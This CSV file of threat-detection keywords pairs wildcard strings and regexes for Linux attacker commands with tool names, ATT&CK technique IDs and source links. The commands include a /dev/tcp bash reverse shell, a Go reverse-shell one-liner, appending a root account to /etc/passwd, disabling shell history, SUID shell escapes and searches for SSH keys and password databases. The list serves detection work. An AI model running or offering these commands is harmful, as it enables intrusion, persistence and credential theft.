"*echo 'package main;*net.Dial(""tcp""*exec.Command(""bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*echo 'set +o history' >> /etc/profile*",".{0,1000}echo\s\'set\s\+o\shistory\'\s\>\>\s\/etc\/profile.{0,1000}","greyware_tool_keyword","echo","linux command abused by attacker","T1146 - T1059.004 - T1556.003","TA0005 - TA0009 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*.sh --passwd-user --custom --passwd-string *",".{0,1000}\.sh\s\-\-passwd\-user\s\-\-custom\s\-\-passwd\-string\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*ehorus_agent -f /etc/ehorus/*",".{0,1000}ehorus_agent\s\-f\s\/etc\/ehorus\/.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*emacs -Q -nw --eval '(term \""/bin/sh -p\"")*",".{0,1000}emacs\s\-Q\s\-nw\s\-\-eval\s\'\(term\s\\\""\/bin\/sh\s\-p\\\""\).{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*:0:0:root:/root:/bin/bash"" >> /etc/passwd*",".{0,1000}\:0\:0\:root\:\/root\:\/bin\/bash\""\s\>\>\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*ERPScan-tockenchpoken.zip*",".{0,1000}ERPScan\-tockenchpoken\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*exec /bin/sh 0</dev/tcp/*/*1>&0 2>&0*",".{0,1000}exec\s\/bin\/sh\s0\<\/dev\/tcp\/.{0,1000}\/.{0,1000}1\>\&0\s2\>\&0.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","10","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*'exec /bin/sh -p 0<&1' >> \$TF*",".{0,1000}\'exec\s\/bin\/sh\s\-p\s0\<\&1\'\s\>\>\s\\\$TF.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*exec CMD=/bin/sh -f elf -o *.elf*",".{0,1000}exec\sCMD\=\/bin\/sh\s\-f\self\s\-o\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","#linux","N/A","10","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"*exploit.bash*",".{0,1000}exploit\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","72","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
"*Exploitation Toolkit*",".{0,1000}Exploitation\sToolkit.{0,1000}","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/RUB-NDS/PRT","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*exports --dll *.dll --prototypes ./Assets/prototypes.csv*",".{0,1000}exports\s\-\-dll\s.{0,1000}\.dll\s\-\-prototypes\s\.\/Assets\/prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","#linux","N/A","10","10","996","134","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z"
"*f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08*","f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995*","f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*enum4linux*",".{0,1000}enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","#linux","N/A","N/A","10","1190","239","2024-10-11T14:41:57Z","2015-07-31T21:06:03Z"
"*[+] /etc/passwd persistence established!*",".{0,1000}\[\+\]\s\/etc\/passwd\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*find . -exec /bin/sh \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","find","It can be used to break out from restricted environments by spawning an interactive system shell.","T1059.004 - T1219 - T1027","TA0002 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*find . -exec /bin/sh -p \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\-p\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*find . -name spring-beans*.jar*",".{0,1000}find\s\.\s\-name\sspring\-beans.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","#linux","N/A","N/A","4","361","105","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z"
"*find . -perm -2 -ls*",".{0,1000}find\s\.\s\-perm\s\-2\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","10","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -perm -2 -ls*",".{0,1000}find\s\.\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find . -type f -name .bash_history*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find . -type f -name .fetchmailrc*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*[+] User * added to /etc/passwd with root privileges.*",".{0,1000}\[\+\]\sUser\s.{0,1000}\sadded\sto\s\/etc\/passwd\swith\sroot\sprivileges\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*passwd*john*",".{0,1000}passwd.{0,1000}john.{0,1000}","greyware_tool_keyword","passwd","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*./exploit /etc/passwd 1 ootz:*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\sootz\:.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","#linux","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z"
"*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find . -type f -name service.pwd*",".{0,1000}find\s\.\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find . -type f -perm -02000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find . -type f -perm -04000 -ls*",".{0,1000}find\s\.\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / * -4000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-4000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*find / * -perm -2000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-perm\s\-2000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*find / * -regextype egrep -iregex*\.kdbx*",".{0,1000}find\s\/\s.{0,1000}\s\-regextype\segrep\s\-iregex.{0,1000}\\\.kdbx.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*find / -name authorized_keys *> /dev/null*",".{0,1000}find\s\/\s\-name\sauthorized_keys\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_dsa 2>*",".{0,1000}find\s\/\s\-name\sid_dsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_rsa *> /dev/null*",".{0,1000}find\s\/\s\-name\sid_rsa\s.{0,1000}\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -name id_rsa 2>*",".{0,1000}find\s\/\s\-name\sid_rsa\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm /2000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\/2000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*find / -perm +4000 -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+4000\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm +8000 -ls 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\+8000\s\-ls\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*find / -perm -2 -ls*",".{0,1000}find\s\/\s\-perm\s\-2\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -perm -2 -ls*",".{0,1000}find\s\/\s\-perm\s\-2\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -perm -2000",".{0,1000}find\s\/\s\-perm\s\-2000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -4000",".{0,1000}find\s\/\s\-perm\s\-4000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -4000 -type f *",".{0,1000}find\s\/\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm -g=s",".{0,1000}find\s\/\s\-perm\s\-g\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -u=s",".{0,1000}find\s\/\s\-perm\s\-u\=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","#linux","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -perm -u=s -type f 2>/dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -perm -u=s -type f -group */dev/null*",".{0,1000}find\s\/\s\-perm\s\-u\=s\s\-type\sf\s\-group\s.{0,1000}\/dev\/null.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -name .bash_history*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.bash_history.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
